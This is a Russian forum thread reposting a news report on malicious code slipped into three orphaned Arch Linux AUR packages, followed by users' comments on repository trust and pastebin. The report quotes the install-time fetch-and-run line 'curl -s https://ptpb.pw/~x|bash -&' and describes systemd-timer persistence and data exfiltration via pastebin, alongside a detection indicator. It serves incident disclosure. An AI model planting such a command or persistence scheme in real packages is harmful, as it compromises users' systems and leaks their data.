В AUR-репозитории Arch Linux, в котором размещаются не входящие в дистрибутив пакеты от сторонних разработчиков, найдены три пакета, содержащие вредоносные вставки. Проблема выявлена в пакетах acroread 9.5.5-8 (Adobe PDF Reader), balz 1.20-3 (утилита для сжатия файлов) и minergate 8.1-2 (GUI для майнинга криптовалют). В данные пакеты был добавлен код для загрузки и запуска скрипта с внешнего сервера, активируемый во время установки пакетов.
7 июля в пакеты были внесены изменения, в результате которых в файл PKGBUILD был добавлен код "curl -s https://ptpb.pw/~x|bash -&" вызываемый в секции установки пакета. Указанный скрипт выполнял загрузку другого скрипта "https://ptpb.pw/~u", устанавливал его как /usr/lib/xeactor/u.sh и активировал через периодический вызов по таймеру (создавался файл /usr/lib/systemd/system/xeactor.timer). В скрипте u.sh присутствовал код для отправки сведений о системе и установленных пакетах через сервис pastebin.com, а также для создания файла compromised.txt в домашних директориях всех пользователей.
Несмотря на то, что вредоносный код ограничивался отправкой сведений о системе, ничто не мешает злоумышленникам в любой момент заменить содержимое u.sh. Например, на первом этапе злоумышленниками мог проводиться анализ наиболее популярных системных окружений с целью подбора оптимального для большинства поражённых систем кода для майнинга криптовалют или требующего выкуп вредоносного шифровальщика.
Изменения были внесены пользователем xeactor в пакеты, имеющие статус orphaned, т.е. оставшиеся без мэйнтейнера. AUR позволяет любому желающему продолжать разработку orphane-пакетов, чем и воспользовался злоумышленник. Разработчики дистрибутива много раз предупреждали пользователей, что к пакетам из AUR (также справедливо для PPA и прочих репозиториев, в которых сторонние пользователи могут размещать свои пакеты) следует относиться с осторожностью и по возможности проверять содержимое файла PKGBUILD.
Проблема была выявлена в течение нескольких часов после модификации пакетов. Изменение было сразу отклонено, а учётная запись разработчика xeactor заблокирована. Пользователям, 7 июля устанавливавшим обновления вышеотмеченных пакетов, рекомендуется проверить свои системы на предмет возможной компрометации (например, о наличии вредоносного ПО в системе может сигнализировать файл /usr/lib/systemd/system/xeactor.timer).
Источник новости
В AUR-репозитории Arch Linux найдено вредоносное ПО
Модератор: LinuxNEWS
-
- Сообщения: 10015
- Зарегистрирован: 27 авг 2016, 22:57
- Решено: 215
- Откуда: НН
- Благодарил (а): 815 раз
- Поблагодарили: 3010 раз
- Контактная информация:
В AUR-репозитории Arch Linux найдено вредоносное ПО
Ничего удивительного)
Справедливости ради, нужно отметить, что с ппа или с дебками по прямым url такое тоже вполне может может произойти - т.к. таская пакеты мимо основного репа - там может найтись что угодно, в теории. И поставщику по надо в этом случае явно доверять.
Только вот ппа диверсифицированы, они маленькие и их много. Шанс что на хосте пользователя окажется конретный скомпрометированный реп с пакетом - в общем-то невелик.
А аур одна большая свалка с этим добром, причем тамошние pkgduild'ы вполне могут таскать для установки в арч те же дебки прямиком с ппа
Справедливости ради, нужно отметить, что с ппа или с дебками по прямым url такое тоже вполне может может произойти - т.к. таская пакеты мимо основного репа - там может найтись что угодно, в теории. И поставщику по надо в этом случае явно доверять.
Только вот ппа диверсифицированы, они маленькие и их много. Шанс что на хосте пользователя окажется конретный скомпрометированный реп с пакетом - в общем-то невелик.
А аур одна большая свалка с этим добром, причем тамошние pkgduild'ы вполне могут таскать для установки в арч те же дебки прямиком с ппа
-
- Сообщения: 1650
- Зарегистрирован: 10 сен 2016, 10:16
- Решено: 19
- Откуда: Москва
- Благодарил (а): 697 раз
- Поблагодарили: 187 раз
- Контактная информация:
В AUR-репозитории Arch Linux найдено вредоносное ПО
С сайта pastebin.com, машинный перевод (яндексом):
Что такое Pastebin.com о чем?
Pastebin-это веб-сайт, где вы можете хранить любой текст в Интернете для легкого обмена. Веб-сайт в основном используется программистами для хранения фрагментов исходного кода или информации о конфигурации, но любой человек более чем может вставить любой тип текста. Идея сайта заключается в том, чтобы сделать его более удобным для людей, чтобы делиться большими объемами текста в интернете.
Вот я и думаю, какой практический смысл у этого сервиса? Мог бы я его хоть к какой-нибудь практической задаче приспособить? Или этот сервис для гуманоидов из совершенно другого, параллельного мира и мне их побуждения не понять никогда?
-
- Сообщения: 1744
- Зарегистрирован: 29 авг 2016, 12:08
- Решено: 20
- Благодарил (а): 108 раз
- Поблагодарили: 521 раз
- Контактная информация:
В AUR-репозитории Arch Linux найдено вредоносное ПО
обмен кусками кода или выводом терминала например.StarMAUGLI писал(а): ↑18 июл 2018, 18:13Вот я и думаю, какой практический смысл у этого сервиса? Мог бы я его хоть к какой-нибудь практической задаче приспособить?
А мог бы стать нормальным человеком...
Кто сейчас на конференции
Сейчас этот форум просматривают: нет зарегистрированных пользователей и 5 гостей